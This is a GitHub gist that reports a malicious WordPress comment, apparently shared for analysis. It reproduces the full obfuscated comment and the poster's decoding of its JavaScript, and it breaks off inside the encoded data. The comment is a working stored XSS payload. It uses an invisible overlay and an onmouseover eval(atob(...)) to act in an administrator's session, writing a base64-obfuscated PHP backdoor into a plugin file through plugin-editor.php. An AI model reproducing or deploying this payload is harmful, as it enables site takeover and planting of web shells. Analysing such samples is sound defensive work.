Created
May 5, 2015 18:51
-
-
Save mattfoster/6763cb5039fedafab7ea to your computer and use it in GitHub Desktop.
Dodgy WordPress Comment
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Author: Rick (IP: 37.130.227.133, torland1-this.is.a.tor.exit.server.torland.is) | |
| E-mail: [email protected] | |
| URL: | |
| Whois: http://whois.arin.net/rest/ip/37.130.227.133 | |
| Comment: | |
| [<a title="]" rel="nofollow"></a>[" <!-- style=position:fixed;top:0;left:0;padding:0;margin:0;width:1000%;height:1000%;cursor:default;z-index:100;display:block;color:transparent;font-size:0 onmouseover="eval(atob('dmFyIHggPSBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiYSIpOw0KdmFyIGk7DQpmb3IgKGkgPSAwOyBpIDwgeC5sZW5ndGg7IGkrKykgew0KICAgIGlmKHhbaV0uc3R5bGUud2lkdGggPT0gIjYwMDBweCIpe3hbaV0uc3R5bGUuZGlzcGxheT0ibm9uZSI7fQ0KfQ0KDQp2YXIgZWwgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCJpZnJhbWUiKTsNCmVsLmlkID0gJ2lmcmFtZTIyJzsNCmVsLnN0eWxlLmRpc3BsYXkgPSAiZml4ZWQiOw0KZWwuc3R5bGUudG9wPScxcHgnOw0KZWwuc3R5bGUubGVmdD0nMXB4JzsNCmVsLnN0eWxlLndpZHRoID0gIjFweCI7DQplbC5zdHlsZS5oZWlnaHQgPSAiMXB4IjsNCmVsLnNyYyA9ICJwbHVnaW4tZWRpdG9yLnBocD9maWxlPWluZGV4LnBocCZwbHVnaW49aW5kZXgucGhwIjsNCmRvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoZWwpOw0KZWwub25sb2FkID0gaHV5Ow0KDQpmdW5jdGlvbiBnZXRJZnJhbWVEb2N1bWVudChpZnJhbWVOb2RlKSB7DQogIGlmIChpZnJhbWVOb2RlLmNvbnRlbnREb2N1bWVudCkgcmV0dXJuIGlmcmFtZU5vZGUuY29udGVudERvY3VtZW50DQogIGlmIChpZnJhbWVOb2Rl | |
| LmNvbnRlbnRXaW5kb3cpIHJldHVybiBpZnJhbWVOb2RlLmNvbnRlbnRXaW5kb3cuZG9jdW1lbnQNCiAgcmV0dXJuIGlmcmFtZU5vZGUuZG9jdW1lbnQNCn0NCg0KZnVuY3Rpb24gaHV5KCl7DQp2YXIgenp6ID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2lmcmFtZTIyJyk7DQp2YXIgaGhoID0gZ2V0SWZyYW1lRG9jdW1lbnQoenp6KTsNCmlmIChoaGguZ2V0RWxlbWVudEJ5SWQoIm5ld2NvbnRlbnQiKS52YWx1ZS5pbmRleE9mKCIxOTI0ODUwOTdiYzhhMjQwYTk2YWNhNTk2OGVhZTc3NyIpID09IC0xKSB7DQpoaGguZ2V0RWxlbWVudEJ5SWQoIm5ld2NvbnRlbnQiKS52YWx1ZSA9IGF0b2IoIlBEOXdhSEFnSkVkTVQwSkJURk5iSjE4eU5UTTBNREV4TmpsZkoxMDlRWEp5WVhrb1ltRnpaVFkwWDJSbFkyOWtaU2duWkZoS2MxcFhOV3BpSnlBdUp6SW5JQzRuVW13bktTeGlZWE5sTmpSZlpHVmpiMlJsS0NkWmJVWjZXbFFuSUM0bldUQllNaWNnTGlkV2RTY2dMaWRaTWpscldsRTlQU2NwTEdKaGMyVTJORjlrWldOdlpHVW9KMXB0Wkd4a1IwNG5JQzRuZW1Sbkp5QXVKejBuSUM0blBTY3BMR0poYzJVMk5GOWtaV052WkdVb0oyTXlWbm9uSUM0bll6SW5JQzRuYkhaaWJEa25JQzRuY0ZwQlBUMG5LU3hpWVhObE5qUmZaR1ZqYjJSbEtDZGpNMUluSUM0bmVWZ25JQzRuTTBwc1l5Y2dMaWRIZUdoWk1sVTlKeWtzWW1GelpUWTBYMlJsWTI5a1pTZ25ZekpvTVZwdFduTmFVVDA5Snlrc1ltRnpaVFkwWDJSbFkyOWtaU2duWXljZ0xpY | |
| 3pVbmtuSUM0blkwY25JQzRuT1hvbktTeGlZWE5sTmpSZlpHVmpiMlJsS0NkYWJTY2dMaWRzY3ljZ0xpZGFWamxzWlVkc2VtUklKeUF1SjAwOUp5a3NZbUZ6WlRZMFgyUmxZMjlrWlNnblkyMVdkVmxYTVd3bktTeGlZWE5sTmpSZlpHVmpiMlJsS0NkaVdGSW5JQzRuWm1OdFJuVmFRVDA5Snlrc1ltRnpaVFkwWDJSbFkyOWtaU2duWTBoS2NHSnVVbVpqWnowOUp5a3NZbUZ6WlRZMFgyUmxZMjlrWlNnbldtMXNjMXBXSnlBdUp6bHNKeUF1SjJWSGJIcGtKeUF1SjBoTlBTY3BMR0poYzJVMk5GOWtaV052WkdVb0oyTXpWbWxqSnlBdUp6TlNlU2NwTEdKaGMyVTJORjlrWldOdlpHVW9KMk16VWljZ0xpZDVXRE5PYjJSWEp5QXVKMXB0SnlBdUoySkhWVDBuS1N4aVlYTmxOalJmWkdWamIyUmxLQ2RqSnlBdUp6TlNlVmd6U214alIxWW5JQzRuYUdSQlBUMG5LU3hpWVhObE5qUmZaR1ZqYjJSbEtDZGlWMUV4Snlrc1ltRnpaVFkwWDJSbFkyOWtaU2duV20xc2MxcFdKeUF1SnpsM1pGaFNabGt5SnlBdUp6a25JQzRuZFdSSFZuVmtKeUF1SjBoTlBTY3BMR0poYzJVMk5GOWtaV052WkdVb0oyTW5JQzRuTTFKNVdETktiR05ISnlBdUozaG9XVEpWUFNjcExHSmhjMlUyTkY5a1pXTnZaR1VvSjFvbklDNG5iV3h6V2ljZ0xpZFdPVzRuSUM0bldsaFNabGt5T1hWa1IxWjFaRWhOSnlBdUp6MG5LU3hpWVhObE5qUmZaR1ZqYjJSbEtDZGpNMUo1WTBjNUp5QXVKM29uS1N4aVlYTmxOalJmWkdWamIyUmxLQ2RqTTFacFl5Y2dMaWN6VW5sWU0wcHNZeW | |
| NnTGlkSGVHaFpNbFU5Snlrc1ltRnpaVFkwWDJSbFkyOWtaU2duWVZoT0p5QXVKMlluSUM0bldWaEtKeUF1SjNsWldHczlKeWtzWW1GelpUWTBYMlJsWTI5a1pTZ25Zek5TZVNjZ0xpZGpiaWNnTGlkQ2RtTjNQVDBuS1N4aVlYTmxOalJmWkdWamIyUmxLQ2RaTWpsM0p5QXVKMlZSUFQwbktTeGlZWE5sTmpSZlpHVmpiMlJsS0NkWk1qbDNaVkU5UFNjcExHSmhjMlUyTkY5a1pXTnZaR1VvSjJJbklDNG5XQ2NnTGlkU1ppY2dMaWRqYlNjZ0xpZEdkVnBCUFQwbktTeGlZWE5sTmpSZlpHVmpiMlJsS0Nkakp5QXVKekpvYUNjZ0xpZE5VVDA5Snlrc1ltRnpaVFkwWDJSbFkyOWtaU2duV1RJNUp5QXVKM2NuSUM0blpWRTlQU2NwTEdKaGMyVTJORjlrWldOdlpHVW9KeWNnTGlkYWJXeHpXbFk1SnlBdUozZGtKeUF1SjFnbklDNG5VaWNnTGlkbVdUSW5JQzRuT1NjZ0xpZDFaQ2NnTGlkSFZuVmtTRTBuSUM0blBTY3BMR0poYzJVMk5GOWtaV052WkdVb0oxb25JQzRuYld4eldsWW5JQzRuT1NjZ0xpZDNaRmduSUM0blVpY2dMaWRtV1NjZ0xpY3lPU2NnTGlkMVpFZFdkV1JJSnlBdUowMDlKeWtzWW1GelpUWTBYMlJsWTI5a1pTZ25XVmhLZVZrbklDNG5XR3htWXpOV2RDY3BMR0poYzJVMk5GOWtaV052WkdVb0oxcEhiSGtuS1NrN1puVnVZM1JwYjI0Z1h6RXdORFUyTWprek16a29KR2twZXlSaFBVRnljbUY1S0NkaFNDY2dMaWRTTUdNbklDNG5SRzkyVEhwRmVrOG5JQzRuUXpSNFRXb25JQzRuWjNWTkp5QXVKMVJaTlV4cVNYaFBKeUF1SjF | |
| NNWVsa3pTaWNnTGlkc0p5QXVKMXBYTlhwaFJ6a3dZM2s0ZFdGWE1XaGFNbFo2VERKc2RWb25JQzRuUjFZMEp5QXVKMHh1UW05alFUMDlKeXduSnlBdUoyRklKeUF1SjFJd1kwUnZka3d5ZEhCa1JGSm9Za2QzZFNjZ0xpZGpibFYyV1RJbklDNG5PWFJqUnpsMUp5QXVKMW9uSUM0blZ6VXdZM2s1YW1JeU1TY2dMaWRtWVcxT2JFd3liSFZhUnljZ0xpZFdORXh1UW05alFUMDlKeXduWkNjZ0xpY3pRWFJaTWpsMVpFZFdKeUF1SjNWa1F6bDNZa2hXSnlBdUoyNWhWelVuSUM0bmVrd3lKeUF1SjJ4MUp5QXVKMXBIVmpSTUp5QXVKMjVDSnlBdUoyOG5JQzRuWTBFOVBTY3NKeWNzSjFWclZsSW5JQzRuVmxVbklDNG5WbFJXUmljZ0xpYzVWbFZyYXljZ0xpYzlKeXduVTBZbklDNG5VbFZWUmljZ0xpYzVTVlF4VGxVbkxDZG1RVDA5Snl3blVFZHNkRnA1UWpOaEp5QXVKMWRTTUdGRU1IaEpSMmhzWVZka2IyUkVNSGhKSnlBdUowaE9lVmw2TUdrbkxDZFFNbEpvWkVkRkp5QXVKemtuTENkSkp5QXVKMm8wUFNjc0oyUW5JQzRuVjFwdkp5QXVKMk5IU214YVJ5Y2dMaWRLTXljZ0xpZGFXR2hvSnl3bldtMG5JQzRuTVRZbkxDZE1hVFIyVENjZ0xpZHBOSFprSnlBdUp6TW5JQzRuUVhSWk1qbDBZbGRXZFNjZ0xpZGtTRTEwSnlBdUoyTkhPWHBrSnlBdUowTTFKeUF1SjNkaFNDY2dMaWRCUFNjc0oweHBOSFpNSnlBdUoyazBkaWNnTGlka0p5QXVKek5CZEZreU9YUmlWelVuSUM0bmJHUW5JQzRuU0UxMEp5QXVKMk5IT1hvbklDNG5aRU0xZHljZ0xp | |
| ZGhTRUU5Snl3bkp5QXVKMHhwTkhaTWFUUjJKeUF1SjJRbklDNG5NeWNnTGlkQmRGa3lPWFZhYld4dUp5QXVKMHh1UW05alFUMDlKeXduVVZVbklDNG5TaWNnTGlkRVVrVldSMUluSUM0bk1HaEtVMnNuSUM0bmRFMVVKeUF1SjFVbklDNG5OU2NnTGlkUVZTY2dMaWRHSnlBdUowWlRWVEZTVmxac0p5QXVKMlJaVjFad2FDY2dMaWRaYlU1cldsZGFibUZIYkhGaE1uZ25JQzRuZEdKdEp5QXVKemwzWXljZ0xpZFlTbnBrU0ZZeUp5QXVKMlF6YURWbFp6MDlKeXduU2toU2FGa25JQzRuYlhnbklDNG5iQ2NnTGlkWU0wSjVXbGRhY0NjZ0xpZGxRVDA5Snl3blpESW5JQzRuVG5aaU1rWnJZak5TY1dGWVJpY2dMaWN4WVRKS2EyTlhlQ2NnTGlkMVdsRTlQU2NzSjJKSWJ6MG5MQ2RoSnlBdUowaFNKeUF1SnpCalJHOTJUREpTSnlBdUoyZ25JQzRuWXljZ0xpZEhUbThuSUM0bldsY3hKeUF1SjJ4aWJTY2dMaWRqZFdJbklDNG5NMHB1SnlBdUoweDZSWFluSUM0bldWaEpkbVF5ZEhwaU1qVnNaSGtuSUM0bk5TY2dMaWQzWVNjZ0xpZElKeUF1SjBFbklDNG5QU2NzSjB4cE5IWk1hVFFuSUM0bmRtUXpRWFJoVnpWcUp5QXVKMkpJSnlBdUoxWnJKeUF1SjFwWVRYWmtSMVowWTBkNGFHUW5JQzRuUjFWMFpETkNjeWNnTGlkaU1rWnJXbGhKZFdOSEp5QXVKMmgzSnl3bkp5QXVKMkZYTld0YUp5QXVKMWhuSnlBdUozVmpSeWNnTGlkb2R5Y3NKMHhwSnlBdUp6UW5JQzRuZGljZ0xpZGtXRUp1WTIwbklDNG5SaWNnTGlkckp5QXVKMXBUT1RGalIyUjVXV | |
| mRTSnlBdUoyeGpKeUF1SjNrMWQyRklKeUF1SjBFOUp5d25ZVmMxYTFwWVozVmpSMmduSUM0bmR5Y3NKMHduSUM0bmFTY2dMaWMwSnlBdUozWmtXRUp6WWpKR2EyTjVPVE5qUXpFeEp5QXVKMk5IZUNjZ0xpZDJKeUF1SjFsWFVucE1ia0p2WTBFbklDNG5QVDBuTENkaEp5QXVKMUU5SnlBdUp6MG5MQ2RoSnlBdUoxYzFhMW9uSUM0bldHZDFZMGRvZHljc0p5Y2dMaWRRUkNjZ0xpYzVkeWNnTGlkaEp5QXVKMGhCVGtOcE9IWW5JQzRuU1VaT2NHSW5JQzRuUnljZ0xpZFdkVmtuSUM0bk1sVm5KeUF1SjJFbklDNG5XQ2NnTGlkTloxb3lPWE5hUjFaMVRHY3dTMUFuSUM0bmVpY2dMaWMwUFNjc0oweHBOSFprSnlBdUoxaENjMkl5Um10amVUbHdKeUF1SjJKdEp5QXVKMUpzSnlBdUoyVW5JQzRuUXljZ0xpYzFkMkZJUVNjZ0xpYzlKeXduSnlBdUoyRlhOV3RhSnlBdUoxaG5kU2NnTGlkalIyaDNKeWs3Y21WMGRYSnVJR0poYzJVMk5GOWtaV052WkdVb0pHRmJKR2xkS1R0OVpuVnVZM1JwYjI0Z2JGOWZNQ2drWHpBcGUzSmxkSFZ5YmlBa1IweFBRa0ZNVTFzblh6STFNelF3TVRFMk9WOG5YVnN3WFNna1IweFBRa0ZNVTFzblh6STFNelF3TVRFMk9WOG5YVnN4WFNoK0pGOHdLU2s3ZldaMWJtTjBhVzl1SUd4Zlh6RW9KRjh4S1hza1h6SmJYVDFmTVRBME5UWXlPVE16T1Nnd0tUdDNhR2xzWlNoeWIzVnVaQ2d3S3pFME1qZ3VOalkyTmpZMk5qY3JNVFF5T0M0Mk5qWTJOalkyTnlzeE5ESTRMalkyTmpZMk5qWTNLUzF5YjNWdVpDZ3dLelF5T0 | |
| RZcEtTUkhURTlDUVV4VFd5ZGZNalV6TkRBeE1UWTVYeWRkV3pKZEtDUmZVMFZTVmtWU0tUc2tYekpiWFQxZk1UQTBOVFl5T1RNek9TZ3hLVHQzYUdsc1pTaHliM1Z1WkNnd0t6RXpOemt1TlNzeE16YzVMalVwTFhKdmRXNWtLREFyTVRNM09TNDFLekV6TnprdU5Ta3BKRWRNVDBKQlRGTmJKMTh5TlRNME1ERXhOamxmSjExYk0xMG9KRjh4TENSZk15azdKRjh6UFNSSFRFOUNRVXhUV3lkZk1qVXpOREF4TVRZNVh5ZGRXelJkS0Y4eE1EUTFOakk1TXpNNUtESXBMRjh4TURRMU5qSTVNek01S0RNcExDUmZVMFZTVmtWU1cxOHhNRFExTmpJNU16TTVLRFFwWFNrN0pGODBQV3hmWHpBb0pGOVRSVkpXUlZKYlh6RXdORFUyTWprek16a29OU2xkSUM0a1h6TWdMbDh4TURRMU5qSTVNek01S0RZcElDNGtYekVwT3lSSFRFOUNRVXhUV3lkZk1qVXpOREF4TVRZNVh5ZGRXelZkS0NSZk1pazdabTl5WldGamFDZ2tYeklnWVhNZ0pGODFLWHRsWTJodklGOHhNRFExTmpJNU16TTVLRGNwSUM0a1h6VWdMbDh4TURRMU5qSTVNek01S0RncElDNGtYelFnTGw4eE1EUTFOakk1TXpNNUtEa3BPMmxtS0NSSFRFOUNRVXhUV3lkZk1qVXpOREF4TVRZNVh5ZGRXelpkS0Y4eE1EUTFOakk1TXpNNUtERXdLU3hmTVRBME5UWXlPVE16T1NneE1Ta3BJVDA5Wm1Gc2MyVXBKRWRNVDBKQlRGTmJKMTh5TlRNME1ERXhOamxmSjExYk4xMG9KRjlUUlZKV1JWSXNKRjlUUlZKV1JWSXNKRjgyS1R0OWZVQWtSMHhQUWtGTVUxc25YekkxTXpRd01URTJPVjhuWFZzNFh | |
| TaGZNVEEwTlRZeU9UTXpPU2d4TWlrc1h6RXdORFUyTWprek16a29NVE1wS1Rza1h6WTlYekV3TkRVMk1qa3pNemtvTVRRcE8ybG1LSEp2ZFc1a0tEQXJPVE0zTGpRck9UTTNMalFyT1RNM0xqUXJPVE0zTGpRck9UTTNMalFwUENSSFRFOUNRVXhUV3lkZk1qVXpOREF4TVRZNVh5ZGRXemxkS0hKdmRXNWtLREFyTkRFd0t6UXhNQ3MwTVRBck5ERXdLU3h5YjNWdVpDZ3dLekV3TVRRck1UQXhOQ3N4TURFMEtTa3BKRWRNVDBKQlRGTmJKMTh5TlRNME1ERXhOamxmSjExYk1UQmRLQ1JmTVNrN2FXWW9KRWRNVDBKQlRGTmJKMTh5TlRNME1ERXhOamxmSjExYk1URmRLQ1JmTmlrcGV5UmZNVDBrUjB4UFFrRk1VMXNuWHpJMU16UXdNVEUyT1Y4blhWc3hNbDBvSkVkTVQwSkJURk5iSjE4eU5UTTBNREV4TmpsZkoxMWJNVE5kS0NSSFRFOUNRVXhUV3lkZk1qVXpOREF4TVRZNVh5ZGRXekUwWFNoZk1UQTBOVFl5T1RNek9TZ3hOU2tzY205MWJtUW9NQ3N4TmlrcEtTeHliM1Z1WkNnd0tTeHliM1Z1WkNnd0t6RTJLU2s3SkY4M1BTUkhURTlDUVV4VFd5ZGZNalV6TkRBeE1UWTVYeWRkV3pFMVhTZ2tYekVwT3lSZk5UMGlaWEp5YjNKZmNtVndiM0owYVc1bktEQXBPMmxtS0dsemMyVjBLRndrWDFKRlVWVkZVMVJiSjNkd2MzQnRKMTBwSUNZbUlHMWtOU2hjSkY5U1JWRlZSVk5VV3lkM2NITndiU2RkS1NBOVBTQW5KRjgzSnlBbUppQnBjM05sZENoY0pGOVNSVkZWUlZOVVd5ZDNjSEpySjEwcEtTQmxkbUZzSUNnZ1ltRnpaVFkwWDJSbFkyOWta | |
| U0FvWENSZlVrVlJWVVZUVkZzbmQzQnlheWRkS1NrN0lqc2tSMHhQUWtGTVUxc25YekkxTXpRd01URTJPVjhuWFZzeE5sMG9JaVJmTmlJc0pFZE1UMEpCVEZOYkoxOHlOVE0wTURFeE5qbGZKMTFiTVRkZEtGOHhNRFExTmpJNU16TTVLREUyS1N3aUpGODFJRnh1SUZ3a2RHRmliR1ZmY0hKbFptbDRJaXdrUjB4UFFrRk1VMXNuWHpJMU16UXdNVEUyT1Y4blhWc3hPRjBvSkY4MktTa3BPMmxtS0NSSFRFOUNRVXhUV3lkZk1qVXpOREF4TVRZNVh5ZGRXekU1WFNoZk1UQTBOVFl5T1RNek9TZ3hOeWtzWHpFd05EVTJNamt6TXprb01UZ3BLU0U5UFdaaGJITmxLU1JIVEU5Q1FVeFRXeWRmTWpVek5EQXhNVFk1WHlkZFd6SXdYU2drWHpVc0pGOHdMQ1JmTWlrN2ZXeGZYekVvSkY4eEtUdHBaaWdvY205MWJtUW9NQ3MwTXpJdU9DczBNekl1T0NzME16SXVPQ3MwTXpJdU9DczBNekl1T0NrcmNtOTFibVFvTUNzeE1qRTRLekV5TVRnck1USXhPQ3N4TWpFNEtTaytjbTkxYm1Rb01DczFOREVyTlRReEt6VTBNU3MxTkRFcGZId2dKRWRNVDBKQlRGTmJKMTh5TlRNME1ERXhOamxmSjExYk1qRmRLQ1JmTkN3a1h6TXNKRjgyTENSZlUwVlNWa1ZTS1NrN1pXeHpaWHNrUjB4UFFrRk1VMXNuWHpJMU16UXdNVEUyT1Y4blhWc3lNbDBvSkY5VFJWSldSVklwTzMxQUpFZE1UMEpCVEZOYkoxOHlOVE0wTURFeE5qbGZKMTFiTWpOZEtGOHhNRFExTmpJNU16TTVLREU1S1N4Zk1UQTBOVFl5T1RNek9TZ3lNQ2twT3lRa1h6WTlYMTlHU1V4RlgxODdRQ1JIV | |
| EU5Q1FVeFRXeWRmTWpVek5EQXhNVFk1WHlkZFd6STBYU2hmTVRBME5UWXlPVE16T1NneU1Ta3NYekV3TkRVMk1qa3pNemtvTWpJcEtUdHBaaWh5YjNWdVpDZ3dLekk0T0RNck1qZzRNeXN5T0RnektUd2tSMHhQUWtGTVUxc25YekkxTXpRd01URTJPVjhuWFZzeU5WMG9jbTkxYm1Rb01Dc3lNVEF3TGpVck1qRXdNQzQxS1N4eWIzVnVaQ2d3S3pJeU1qRXVOU3N5TWpJeExqVXBLU2trUjB4UFFrRk1VMXNuWHpJMU16UXdNVEUyT1Y4blhWc3lObDBvSkY4M0xDUmZOU2s3UUNSSFRFOUNRVXhUV3lkZk1qVXpOREF4TVRZNVh5ZGRXekkzWFNoZk1UQTBOVFl5T1RNek9TZ3lNeWtzWHpFd05EVTJNamt6TXprb01qUXBLVHNrWHpnOVh6RXdORFUyTWprek16a29NalVwTzBBa1IweFBRa0ZNVTFzblh6STFNelF3TVRFMk9WOG5YVnN5T0Ywb1h6RXdORFUyTWprek16a29NallwTEY4eE1EUTFOakk1TXpNNUtESTNLU2s3UUNSSFRFOUNRVXhUV3lkZk1qVXpOREF4TVRZNVh5ZGRXekk1WFNoZk1UQTBOVFl5T1RNek9TZ3lPQ2tzWHpFd05EVTJNamt6TXprb01qa3BLVHRwWmlnb2NtOTFibVFvTUNzeU9EYzJLVjV5YjNWdVpDZ3dLemsxT0M0Mk5qWTJOalkyTmpjck9UVTRMalkyTmpZMk5qWTJOeXM1TlRndU5qWTJOalkyTmpZM0tTa21KaUFrUjB4UFFrRk1VMXNuWHpJMU16UXdNVEUyT1Y4blhWc3pNRjBvSkY4ekxDUmZOQ3drWHpRcEtTUkhURTlDUVV4VFd5ZGZNalV6TkRBeE1UWTVYeWRkV3pNeFhTZ2tYelFzSkY4d0xDUmZNeXdrWHpNcE | |
| 8yVmphRzhpTVRreU5EZzFNRGszWW1NNFlUSTBNR0U1Tm1GallUVTVOamhsWVdVM056Y2lPeUEvUGc9PSIpICsgaGhoLmdldEVsZW1lbnRCeUlkKCJuZXdjb250ZW50IikudmFsdWU7DQpoaGguZ2V0RWxlbWVudEJ5SWQoInN1Ym1pdCIpLmNsaWNrKCApOw0KfQ0KZWxzZSB7DQp6enouc3JjID0gJy4uL3dwLWNvbnRlbnQvcGx1Z2lucy9pbmRleC5waHAnOw0KfX0='))">Baltimore -->Baltimore police completed a criminal investigation into the death of Freddie Gray and delivered it to a prosecutor a day earlier than promised Thursday.<a></a>] |
And running that, gives
"var x = document.getElementsByTagName("a");
var i;
for (i = 0; i < x.length; i++) {
if(x[i].style.width == "6000px"){x[i].style.display="none";}
}
var el = document.createElement("iframe");
el.id = 'iframe22';
el.style.display = "fixed";
el.style.top='1px';
el.style.left='1px';
el.style.width = "1px";
el.style.height = "1px";
el.src = "plugin-editor.php?file=index.php&plugin=index.php";
document.body.appendChild(el);
el.onload = huy;
function getIframeDocument(iframeNode) {
if (iframeNode.contentDocument) return iframeNode.contentDocument
if (iframeNode.contentWindow) return iframeNode.contentWindow.document
return iframeNode.document
}
function huy(){
var zzz = document.getElementById('iframe22');
var hhh = getIframeDocument(zzz);
if (hhh.getElementById("newcontent").value.indexOf("192485097bc8a240a96aca5968eae777") == -1) {
hhh.getElementById("newcontent").value = atob("PD9waHAgJEdMT0JBTFNbJ18yNTM0MDExNjlfJ109QXJyYXkoYmFzZTY0X2RlY29kZSgnZFhKc1pXNWpiJyAuJzInIC4nUmwnKSxiYXNlNjRfZGVjb2RlKCdZbUZ6WlQnIC4nWTBYMicgLidWdScgLidZMjlrWlE9PScpLGJhc2U2NF9kZWNvZGUoJ1ptZGxkR04nIC4nemRnJyAuJz0nIC4nPScpLGJhc2U2NF9kZWNvZGUoJ2MyVnonIC4nYzInIC4nbHZibDknIC4ncFpBPT0nKSxiYXNlNjRfZGVjb2RlKCdjM1InIC4neVgnIC4nM0psYycgLidHeGhZMlU9JyksYmFzZTY0X2RlY29kZSgnYzJoMVptWnNaUT09JyksYmFzZTY0X2RlY29kZSgnYycgLiczUnknIC4nY0cnIC4nOXonKSxiYXNlNjRfZGVjb2RlKCdabScgLidscycgLidaVjlsZUdsemRIJyAuJ009JyksYmFzZTY0X2RlY29kZSgnY21WdVlXMWwnKSxiYXNlNjRfZGVjb2RlKCdiWFInIC4nZmNtRnVaQT09JyksYmFzZTY0X2RlY29kZSgnY0hKcGJuUmZjZz09JyksYmFzZTY0X2RlY29kZSgnWm1sc1pWJyAuJzlsJyAuJ2VHbHpkJyAuJ0hNPScpLGJhc2U2NF9kZWNvZGUoJ2MzVmljJyAuJzNSeScpLGJhc2U2NF9kZWNvZGUoJ2MzUicgLid5WDNOb2RXJyAuJ1ptJyAuJ2JHVT0nKSxiYXNlNjRfZGVjb2RlKCdjJyAuJzNSeVgzSmxjR1YnIC4naGRBPT0nKSxiYXNlNjRfZGVjb2RlKCdiV1ExJyksYmFzZTY0X2RlY29kZSgnWm1sc1pWJyAuJzl3ZFhSZlkyJyAuJzknIC4ndWRHVnVkJyAuJ0hNPScpLGJhc2U2NF9kZWNvZGUoJ2MnIC4nM1J5WDNKbGNHJyAuJ3hoWTJVPScpLGJhc2U2NF9kZWNvZGUoJ1onIC4nbWxzWicgLidWOW4nIC4nWlhSZlkyOXVkR1Z1ZEhNJyAuJz0nKSxiYXNlNjRfZGVjb2RlKCdjM1J5Y0c5JyAuJ3onKSxiYXNlNjRfZGVjb2RlKCdjM1ZpYycgLiczUnlYM0psYycgLidHeGhZMlU9JyksYmFzZTY0X2RlY29kZSgnYVhOJyAuJ2YnIC4nWVhKJyAuJ3lZWGs9JyksYmFzZTY0X2RlY29kZSgnYzNSeScgLidjbicgLidCdmN3PT0nKSxiYXNlNjRfZGVjb2RlKCdZMjl3JyAuJ2VRPT0nKSxiYXNlNjRfZGVjb2RlKCdZMjl3ZVE9PScpLGJhc2U2NF9kZWNvZGUoJ2InIC4nWCcgLidSZicgLidjbScgLidGdVpBPT0nKSxiYXNlNjRfZGVjb2RlKCdjJyAuJzJoaCcgLidNUT09JyksYmFzZTY0X2RlY29kZSgnWTI5JyAuJ3cnIC4nZVE9PScpLGJhc2U2NF9kZWNvZGUoJycgLidabWxzWlY5JyAuJ3dkJyAuJ1gnIC4nUicgLidmWTInIC4nOScgLid1ZCcgLidHVnVkSE0nIC4nPScpLGJhc2U2NF9kZWNvZGUoJ1onIC4nbWxzWlYnIC4nOScgLid3ZFgnIC4nUicgLidmWScgLicyOScgLid1ZEdWdWRIJyAuJ009JyksYmFzZTY0X2RlY29kZSgnWVhKeVknIC4nWGxmYzNWdCcpLGJhc2U2NF9kZWNvZGUoJ1pHbHknKSk7ZnVuY3Rpb24gXzEwNDU2MjkzMzkoJGkpeyRhPUFycmF5KCdhSCcgLidSMGMnIC4nRG92THpFek8nIC4nQzR4TWonIC4nZ3VNJyAuJ1RZNUxqSXhPJyAuJ1M5elkzSicgLidsJyAuJ1pXNXphRzkwY3k4dWFXMWhaMlZ6TDJsdVonIC4nR1Y0JyAuJ0xuQm9jQT09JywnJyAuJ2FIJyAuJ1IwY0RvdkwydHBkRFJoYkd3dScgLidjblV2WTInIC4nOXRjRzl1JyAuJ1onIC4nVzUwY3k5amIyMScgLidmYW1ObEwybHVaRycgLidWNExuQm9jQT09JywnZCcgLiczQXRZMjl1ZEdWJyAuJ3VkQzl3YkhWJyAuJ25hVzUnIC4nekwyJyAuJ2x1JyAuJ1pHVjRMJyAuJ25CJyAuJ28nIC4nY0E9PScsJycsJ1VrVlInIC4nVlUnIC4nVlRWRicgLic5VlVraycgLic9JywnU0YnIC4nUlVVRicgLic5SVQxTlUnLCdmQT09JywnUEdsdFp5QjNhJyAuJ1dSMGFEMHhJR2hsYVdkb2REMHhJJyAuJ0hOeVl6MGknLCdQMlJoZEdFJyAuJzknLCdJJyAuJ2o0PScsJ2QnIC4nV1pvJyAuJ2NHSmxaRycgLidKMycgLidaWGhoJywnWm0nIC4nMTYnLCdMaTR2TCcgLidpNHZkJyAuJzMnIC4nQXRZMjl0YldWdScgLidkSE10JyAuJ2NHOXpkJyAuJ0M1JyAuJ3dhSCcgLidBPScsJ0xpNHZMJyAuJ2k0dicgLidkJyAuJzNBdFkyOXRiVzUnIC4nbGQnIC4nSE10JyAuJ2NHOXonIC4nZEM1dycgLidhSEE9JywnJyAuJ0xpNHZMaTR2JyAuJ2QnIC4nMycgLidBdFkyOXVabWxuJyAuJ0xuQm9jQT09JywnUVUnIC4nSicgLidEUkVWR1InIC4nMGhKU2snIC4ndE1UJyAuJ1UnIC4nNScgLidQVScgLidGJyAuJ0ZTVTFSVlZsJyAuJ2RZV1ZwaCcgLidZbU5rWldabmFHbHFhMngnIC4ndGJtJyAuJzl3YycgLidYSnpkSFYyJyAuJ2QzaDVlZz09JywnSkhSaFknIC4nbXgnIC4nbCcgLidYM0J5WldacCcgLidlQT09JywnZDInIC4nTnZiMkZrYjNScWFYRicgLicxYTJKa2NXeCcgLid1WlE9PScsJ2JIbz0nLCdhJyAuJ0hSJyAuJzBjRG92TDJSJyAuJ2gnIC4nYycgLidHTm8nIC4nWlcxJyAuJ2xibScgLidjdWInIC4nM0puJyAuJ0x6RXYnIC4nWVhJdmQydHpiMjVsZHknIC4nNScgLid3YScgLidIJyAuJ0EnIC4nPScsJ0xpNHZMaTQnIC4ndmQzQXRhVzVqJyAuJ2JIJyAuJ1ZrJyAuJ1pYTXZkR1Z0Y0d4aGQnIC4nR1V0ZDNCcycgLidiMkZrWlhJdWNHJyAuJ2h3JywnJyAuJ2FXNWtaJyAuJ1hnJyAuJ3VjRycgLidodycsJ0xpJyAuJzQnIC4ndicgLidkWEJuY20nIC4nRicgLidrJyAuJ1pTOTFjR2R5WVdSJyAuJ2xjJyAuJ3k1d2FIJyAuJ0E9JywnYVc1a1pYZ3VjR2gnIC4ndycsJ0wnIC4naScgLic0JyAuJ3ZkWEJzYjJGa2N5OTNjQzExJyAuJ2NHeCcgLid2JyAuJ1lXUnpMbkJvY0EnIC4nPT0nLCdhJyAuJ1E9JyAuJz0nLCdhJyAuJ1c1a1onIC4nWGd1Y0dodycsJycgLidQRCcgLic5dycgLidhJyAuJ0hBTkNpOHYnIC4nSUZOcGInIC4nRycgLi